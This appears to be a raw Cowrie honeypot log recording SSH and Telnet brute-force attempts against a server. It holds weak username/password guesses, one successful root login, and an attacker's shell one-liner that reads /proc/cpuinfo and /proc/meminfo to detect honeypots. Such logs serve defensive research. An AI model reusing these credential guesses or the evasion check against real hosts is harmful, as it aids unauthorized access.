{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:23:14.150381Z","src_ip":"212.227.125.160","session":"5d235d511b54"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"12345","message":"login attempt [admin1/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:23:14.808555Z","src_ip":"212.227.125.160","session":"5d235d511b54"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:23:15.975525Z","src_ip":"212.227.125.160","session":"5d235d511b54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50514,"dst_ip":"1.2.3.4","dst_port":22,"session":"530862af80d3","protocol":"ssh","message":"New connection: 212.227.125.160:50514 (1.2.3.4:22) [session: 530862af80d3]","sensor":"my-vps","timestamp":"2025-08-28T14:23:50.058158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:23:50.058951Z","src_ip":"212.227.125.160","session":"530862af80d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:23:50.220906Z","src_ip":"212.227.125.160","session":"530862af80d3"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"12345678","message":"login attempt [admin1/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:23:50.708984Z","src_ip":"212.227.125.160","session":"530862af80d3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:23:51.873210Z","src_ip":"212.227.125.160","session":"530862af80d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50872,"dst_ip":"1.2.3.4","dst_port":22,"session":"abd9d20a1233","protocol":"ssh","message":"New connection: 212.227.125.160:50872 (1.2.3.4:22) [session: abd9d20a1233]","sensor":"my-vps","timestamp":"2025-08-28T14:24:25.573897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:24:25.575007Z","src_ip":"212.227.125.160","session":"abd9d20a1233"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:24:25.744274Z","src_ip":"212.227.125.160","session":"abd9d20a1233"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"qwerty","message":"login attempt [admin1/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:24:26.257263Z","src_ip":"212.227.125.160","session":"abd9d20a1233"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:24:27.429258Z","src_ip":"212.227.125.160","session":"abd9d20a1233"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51893,"dst_ip":"1.2.3.4","dst_port":23,"session":"502763e64d6f","protocol":"telnet","message":"New connection: 212.227.125.160:51893 (1.2.3.4:23) [session: 502763e64d6f]","sensor":"my-vps","timestamp":"2025-08-28T14:24:55.074447Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42066,"dst_ip":"1.2.3.4","dst_port":22,"session":"df0342d79622","protocol":"ssh","message":"New connection: 212.227.125.160:42066 (1.2.3.4:22) [session: df0342d79622]","sensor":"my-vps","timestamp":"2025-08-28T14:25:00.574603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:25:00.575319Z","src_ip":"212.227.125.160","session":"df0342d79622"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:25:00.751054Z","src_ip":"212.227.125.160","session":"df0342d79622"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"123123","message":"login attempt [admin1/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:25:01.297587Z","src_ip":"212.227.125.160","session":"df0342d79622"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:25:02.479127Z","src_ip":"212.227.125.160","session":"df0342d79622"}
{"eventid":"cowrie.session.connect","src_ip":"31.214.172.54","src_port":49640,"dst_ip":"1.2.3.4","dst_port":22,"session":"0831eeaa7b6f","protocol":"ssh","message":"New connection: 31.214.172.54:49640 (1.2.3.4:22) [session: 0831eeaa7b6f]","sensor":"my-vps","timestamp":"2025-08-28T14:25:06.484397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:25:06.503898Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T14:25:06.599809Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.login.success","username":"root","password":"!Admin","message":"login attempt [root/!Admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:25:06.981966Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:25:07.598222Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.599151Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.599859Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.602202Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.602919Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.604220Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.605296Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.605983Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.607018Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.608502Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.609287Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.712550Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:25:07.714649Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:25:08.029915Z","src_ip":"31.214.172.54","session":"0831eeaa7b6f"}
{"eventid":"cowrie.session.closed","duration":31.320170879364014,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:25:26.394547Z","src_ip":"212.227.125.160","session":"502763e64d6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38240,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab6dac02662","protocol":"ssh","message":"New connection: 212.227.125.160:38240 (1.2.3.4:22) [session: 7ab6dac02662]","sensor":"my-vps","timestamp":"2025-08-28T14:25:36.727605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:25:36.728706Z","src_ip":"212.227.125.160","session":"7ab6dac02662"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:25:36.897169Z","src_ip":"212.227.125.160","session":"7ab6dac02662"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"111111","message":"login attempt [admin1/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:25:37.410075Z","src_ip":"212.227.125.160","session":"7ab6dac02662"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:25:38.635078Z","src_ip":"212.227.125.160","session":"7ab6dac02662"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43176,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe1b3c9e6c97","protocol":"ssh","message":"New connection: 212.227.125.160:43176 (1.2.3.4:22) [session: fe1b3c9e6c97]","sensor":"my-vps","timestamp":"2025-08-28T14:26:13.275387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:26:13.276181Z","src_ip":"212.227.125.160","session":"fe1b3c9e6c97"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:26:13.445250Z","src_ip":"212.227.125.160","session":"fe1b3c9e6c97"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"1234567","message":"login attempt [admin1/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:26:13.956277Z","src_ip":"212.227.125.160","session":"fe1b3c9e6c97"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:26:15.150712Z","src_ip":"212.227.125.160","session":"fe1b3c9e6c97"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53878,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf8875d8376c","protocol":"ssh","message":"New connection: 217.72.205.35:53878 (1.2.3.4:22) [session: cf8875d8376c]","sensor":"my-vps","timestamp":"2025-08-28T14:26:17.109819Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:26:17.111688Z","src_ip":"217.72.205.35","session":"cf8875d8376c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24709,"dst_ip":"1.2.3.4","dst_port":22,"session":"d92431890ca5","protocol":"ssh","message":"New connection: 212.227.235.229:24709 (1.2.3.4:22) [session: d92431890ca5]","sensor":"my-vps","timestamp":"2025-08-28T14:26:26.190613Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:26:26.201908Z","src_ip":"212.227.235.229","session":"d92431890ca5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37674,"dst_ip":"1.2.3.4","dst_port":22,"session":"c712840073f0","protocol":"ssh","message":"New connection: 212.227.125.160:37674 (1.2.3.4:22) [session: c712840073f0]","sensor":"my-vps","timestamp":"2025-08-28T14:26:49.837460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:26:49.838477Z","src_ip":"212.227.125.160","session":"c712840073f0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:26:50.008457Z","src_ip":"212.227.125.160","session":"c712840073f0"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123456","message":"login attempt [dspace/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:26:50.523547Z","src_ip":"212.227.125.160","session":"c712840073f0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:26:51.764160Z","src_ip":"212.227.125.160","session":"c712840073f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50126,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d6885710747","protocol":"ssh","message":"New connection: 212.227.125.160:50126 (1.2.3.4:22) [session: 5d6885710747]","sensor":"my-vps","timestamp":"2025-08-28T14:27:26.268979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:27:26.269891Z","src_ip":"212.227.125.160","session":"5d6885710747"}
